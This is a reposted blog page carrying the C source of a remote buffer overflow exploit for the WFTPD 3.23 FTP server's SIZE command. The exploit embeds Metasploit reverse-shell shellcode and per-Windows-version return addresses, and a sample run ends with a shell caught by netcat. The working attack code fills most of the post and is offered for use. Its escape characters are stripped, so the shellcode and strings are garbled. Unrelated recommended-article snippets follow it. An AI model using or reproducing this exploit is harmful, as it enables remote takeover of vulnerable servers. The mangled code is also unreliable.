WFTPD 3.23 (SIZE) Remote Buffer Overflow Exploit

最新推荐文章于 2019-08-30 09:18:38 发布
最新推荐文章于 2019-08-30 09:18:38 发布
阅读量179 收藏
点赞数

/*
* wftpd_exp.c
* WFTPD server 3.23 (SIZE) 0day remote buffer overflow exploit
* coded by h07 <h07@interia.pl>
* tested on XP SP2 polish, 2000 SP4 polish
* example..

C:>wftpd_exp 0 0 192.168.0.2 h07 open 192.168.0.1 4444

[*] WFTPD server 3.23 (SIZE) 0day remote buffer overflow exploit
[*] coded by h07 <h07@interia.pl>
[*] FTP response: 331 Give me your password, please
[*] FTP response: 230 Logged in successfully
[+] sending buffer: ok
[*] press enter to quit

C:>nc -l -p 4444
Microsoft Windows XP [Wersja 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:wftpd323>
*/

[@more@]

#include
#include
#define BUFF_SIZE 1024
#define PORT 21

//win32 reverse shellcode (metasploit.com)

char shellcode[] =

"x31xc9x83xe9xb8xd9xeexd9x74x24xf4x5bx81x73x13xb6"
"x10x92x98x83xebxfcxe2xf4x4ax7ax79xd5x5exe9x6dx67"
"x49x70x19xf4x92x34x19xddx8ax9bxeex9dxcex11x7dx13"
"xf9x08x19xc7x96x11x79xd1x3dx24x19x99x58x21x52x01"
"x1ax94x52xecxb1xd1x58x95xb7xd2x79x6cx8dx44xb6xb0"
"xc3xf5x19xc7x92x11x79xfex3dx1cxd9x13xe9x0cx93x73"
"xb5x3cx19x11xdax34x8exf9x75x21x49xfcx3dx53xa2x13"
"xf6x1cx19xe8xaaxbdx19xd8xbex4exfax16xf8x1ex7exc8"
"x49xc6xf4xcbxd0x78xa1xaaxdex67xe1xaaxe9x44x6dx48"
"xdexdbx7fx64x8dx40x6dx4exe9x99x77xfex37xfdx9ax9a"
"xe3x7ax90x67x66x78x4bx91x43xbdxc5x67x60x43xc1xcb"
"xe5x53xc1xdbxe5xefx42xf0xb6x10x92x98xd0x78x92x98"
"xd0x43x1bx79x23x78x7ex61x1cx70xc5x67x60x7ax82xc9"
"xe3xefx42xfexdcx74xf4xf0xd5x7dxf8xc8xefx39x5ex11"
"x51x7axd6x11x54x21x52x6bx1cx85x1bx65x48x52xbfx66"
"xf4x3cx1fxe2x8exbbx39x33xdex62x6cx2bxa0xefxe7xb0"
"x49xc6xc9xcfxe4x41xc3xc9xdcx11xc3xc9xe3x41x6dx48"
"xdexbdx4bx9dx78x43x6dx4exdcxefx6dxafx49xc0xfax7f"
"xcfxd6xebx67xc3x14x6dx4ex49x67x6ex67x66x78x62x12"
"xb2x4fxc1x67x60xefx42x98";

void config_shellcode(unsigned long ip, unsigned short port)
{
memcpy(&shellcode[184], &ip, 4);
memcpy(&shellcode[190], &port, 2);
}

unsigned long target[] =
{
0x7d16887b, //JMP ESI (XP SP2 polish)
0x776f2015, //JMP ESI (2000 SP4 polish)
0x7cb9e082, //JMP ESI (XP SP2 english)
0x7848a5f1, //JMP ESI (2000 SP4 english)
0x7ca96834 //JMP ESI (XP SP2 german)
};

char buffer[BUFF_SIZE];

main(int argc, char *argv[])
{
int sock, id, opt, r_len;
unsigned long eip;
unsigned long connectback_IP;
unsigned short connectback_port;
struct hostent *he;
struct sockaddr_in client;
WSADATA wsa;

printf("n[*] WFTPD server 3.23 (SIZE) 0day remote buffer overflow exploitn");
printf("[*] coded by h07 <n">h07@interia.pl>n");

if(argc < 8)
{
printf("[*] usage:..n %s nn", argv[0]);
printf("[*] ID list:n");
printf("[>] 0: XP SP2 polishn");
printf("[>] 1: 2000 SP4 polishn");
printf("[>] 2: XP SP2 englishn");
printf("[>] 3: 2000 SP4 englishn");
printf("[>] 4: XP SP2 germannn");
printf("[*] opt - WFTPD option 'restrict to home directory and below'n");
printf("[>] 0: disabledn");
printf("[>] 1: enablednn");
printf("[*] sample: %s 0 0 192.168.0.2 h07 open 192.168.0.1 4444nn", argv[0]);
exit(0);
}

WSAStartup(MAKEWORD(2, 0), &wsa);

id = atoi(argv[1]);
opt = atoi(argv[2]);

if((id > 4) || (id < 0))
{
printf("[-] ID error: unknown targetn");
exit(-1);
}

if((opt > 1) || (opt < 0))
{
printf("[-] opt error: unknown optionn");
exit(-1);
}

eip = target[id];
connectback_IP = inet_addr(argv[6]) ^ (ULONG)0x989210b6;
connectback_port = htons(atoi(argv[7])) ^ (USHORT)0x9892;
config_shellcode(connectback_IP, connectback_port);

sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

if((he = gethostbyname(argv[3])) == NULL)
{
printf("[-] Unable to resolven");
exit(-1);
}

client.sin_addr = *((struct in_addr *)he->h_addr);
client.sin_port = htons(PORT);
client.sin_family = AF_INET;

if(connect(sock, (struct sockaddr *) &client, sizeof(client)) == -1)
{
printf("[-] error: connect()n");
exit(-1);
}

recv(sock, buffer, BUFF_SIZE -1, 0);

//USER
memset(buffer, 0, BUFF_SIZE);
sprintf(buffer, "USER %srn", argv[4]);
send(sock, buffer, strlen(buffer), 0);
recv(sock, buffer, BUFF_SIZE -1, 0);
printf("[*] FTP response: %s", buffer);

//PASS
memset(buffer, 0, BUFF_SIZE);
sprintf(buffer, "PASS %srn", argv[5]);
send(sock, buffer, strlen(buffer), 0);
recv(sock, buffer, BUFF_SIZE -1, 0);
printf("[*] FTP response: %s", buffer);

if(strstr(buffer, "530") != 0) exit(-1);

//SIZE
memset(buffer, 0x90, BUFF_SIZE);
memcpy(buffer, "SIZE ", 5);

switch(opt)
{
case 0:
{
memcpy(buffer + 5, "/", 1);
r_len = 531;
break;
}
case 1:
{
memcpy(buffer + 5, "//", 2);
r_len = 532;
break;
}
}

memcpy(buffer + 7, shellcode, sizeof(shellcode) -1);
*((unsigned long*)(&buffer[r_len])) = eip;
memcpy(buffer + (r_len + 4), "rnx00", 3);


if(send(sock, buffer, strlen(buffer), 0) != -1)
printf("[+] sending buffer: okn");
else
printf("[-] sending buffer: failedn");

printf("[*] press enter to quitn");
getchar();
}

//EoF

来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/83980/viewspace-859533/,如需转载,请注明出处,否则将追究法律责任。

转载于:http://blog.itpub.net/83980/viewspace-859533/

congjingtuiug4928
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Android Error之BufferOverflowException
I_do_can的博客
08-08 2478
记录一个很奇怪的错误 java.nio.BufferOverflowException at java.nio.ByteBuffer.put(ByteBuffer.java:787) 错误原因也很简单,比如下面这段代码就可以ByteBuffer buffer2 = ByteBuffer.allocate(2); ByteBuffer buffer3 = ByteBuffer.allocate(3
WFTPD server 3.23 (SIZE) 0day remote buffer overflow exploit
weixin_34194551的博客
08-23 251
软件下载地址: wftpd.exe wftpd server 3.23 (size) 0day remote buffer overflow exploit新出的一个溢出漏洞利用工具. /* * wftpd_exp.c * wftpd server 3.23 (size) 0day remote buffer overflow exploit * tested on xp sp2...
wftpd 一个小型的FTP服务端软件
01-31
wftpd 一个小型的FTP服务端软件。wftpd 一个小型的FTP服务端软件。wftpd 一个小型的FTP服务端软件。
打开FTP server或者wftpd32提示 unknow error 10013
夜晚将会美丽
08-30 5316
问题描述 解决方法 重启ftp 参考 问题描述 近期在进行vxworks的相关环境搭建时打开FTP server总提示unknow error,由于没有详细报错信息或错误编号,打开根目录发现调用的是wftpd32程序。 后考虑可能是软件版本问题,去官网下载了最新的wftpd323,还是同样的问题,排除版本问题,不过有错误编号,提供了查找思路 解决方法 经查询,该错误是因为FTP默认使用21...
Address already in use: JVM_Bind 端口被占用的几个解决办法
热门推荐
Mr_JK的专栏
08-10 18万+
运行Tomcat时若出现Address already in use: JVM_Bind 端口被占用,一般使用下面几个办法可以解决: 假设端口为1099 1.启动cmd, 执行命令netstat -ano|findstr  1099 ,会查询出占用端口号的进程号,这时候执行命令     taskkill -f -pid 进程号   杀死进程,然后重启Tomcat即可解决 2.若方法一查询不...
wftpd32工具
03-01
wftpd是一款小型FTP服务器软件,简单易用的FTP SERVER工具,在平时升级设备时,非常有用!!!!!非常简洁的一个软件,能够提供基本的ftp服务器功能。 很好用的一款工具!做CISCO的IOS的 上传下载很方便,使用FTP...
Wftpd.rar_lungs763_stretchblc_wftpd
09-23
《深入解析Wftpd:新一代FTP工具的稳定与高效》 在信息技术日新月异的今天,文件传输协议(FTP)作为互联网上一种基础的文件传输服务,始终扮演着重要的角色。而Wftpd,这款被称为"wtftp 最新版ftp工具"的软件,...
wftpd325.rar
03-29
**FTP服务器基础与WFTPD32介绍** FTP(File Transfer Protocol)是互联网上用于文件传输的标准协议,它允许用户从远程服务器上下载文件或将文件上传到远程服务器。FTP服务器则是运行FTP服务的软件,为用户提供文件...
FTP服务器wftpd32
最新发布
06-10
用于windows下的的简单FTP服务器 wftpd
WFTPD32工具
09-06
wftpd32 wftpd32 wftpd32
wftp32工具
09-11
wftpd是一款WFTP软件,简单易用的FTP SERVER工具,在平时升级设备时,非常有用
WFTPD Server 3.30
06-05
FTP服务器软件,有多个配置选项。方便,稳定,安全,简便,强大。它可以让你在个人计算机上架设一个FTP服务器。它的设定相当简单,并不须要直接修改Windows的INI或Registry文件。它的功能包括:多重连接及匿名登入、线上说明等。
Bug:Address already in use: JVM_Bind问题之总结
03-22
NULL 博文链接:https://googlee.iteye.com/blog/1003057
wftpdwftpd
11-29
运行SecureCRT软件,在注册过程中输入刚才生成的注册信息
出现ftp: bind: Address already in use问题的解决方案
cpongo5
02-05 2114
ftp登录后,使用ls命令出现如下提示:ftp:500 Illegal PORT command.ftp: bind: Address already in use造成这个原因主要是是由于iptables防火墙不支持ip_nat_ftpip_conntrack_ftp 在linux的ftp服务器上执行下列命令即可解决modprobe ip_nat_ftpmodprobe ip_connt...
Xftp上传文件出错:Unknown error问题解决
qq_28900249的博客
01-09 5194
出现该情况有两个原因: 1.检查上传到Linux系统的文件夹是否权限受限,是的话通过 chmod 777 文件夹名   修改权限 2.通过 df-h 命令查看磁盘空间是否已满 ,是的话可以通过简单粗暴的方式进行空间清理,肯定管用 通过命令    sudo apt-get autoremove             删除系统不再使用的孤立软件...
ftp: bind: Address already in use解决
林多
12-29 1万+
ftp: bind: Address already in use 使用ftp命令上传文件时出现如下错误 Server cannot accept argument. ftp: bind: Address already in use 原因:ftp使用了主动模式,导致防火墙将服务器到客户端的连接阻塞。(主动模式下,ftp服务器数据端口20要去连接客户端指定的数据端口。而,一般来讲外部系统到...
Address already in use的解决方法
weixin_34005042的博客
02-16 5738
当客户端保持着与服务器端的连接,这时服务器端断开,再开启服务器时会出现: Address already in usr 可以用netstat -anp | more 可以看到客户端还保持着与服务器的连接(还在使用服务器bind的端口)。这是由于client没有执行close,连接还会等待client的FIN包一段时间。解决方法是使用setsockopt,使得socket可以被重用,是最常用的服务器...
xtfp传输出现unknown error的一种可能
咸鱼的小站
01-10 2201
写在之前:这只是我遇到的一种情况而已,而且本人也是个新手,仅作参考。 情况描述:在传输之前,我尝试在虚拟机上使用vim编辑较大的文本文件,然后中途退出未保存,之后我便发现使用xftp传输一直都是错误,并且描述为unknown error。 首先根据问题描述排除了权限问题,然后我就尝试关闭防火墙,其中操作不多赘述,但是发现仍然无法上传,于是在找了很多可能性之后无意中在使用yum安装某个程序的时候
全球卫星导航信号模拟器GNS8330功能详解与操作指南
在操作上,用户首先需要通过控制软件进行管理,包括运行wftpd32.exe和RNSS_Multi.exe控制程序来启动信号仿真,同时可以选择编辑不同的仿真场景,如设定仿真时间、星座参数、星历、时间、完好性、大气环境等。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值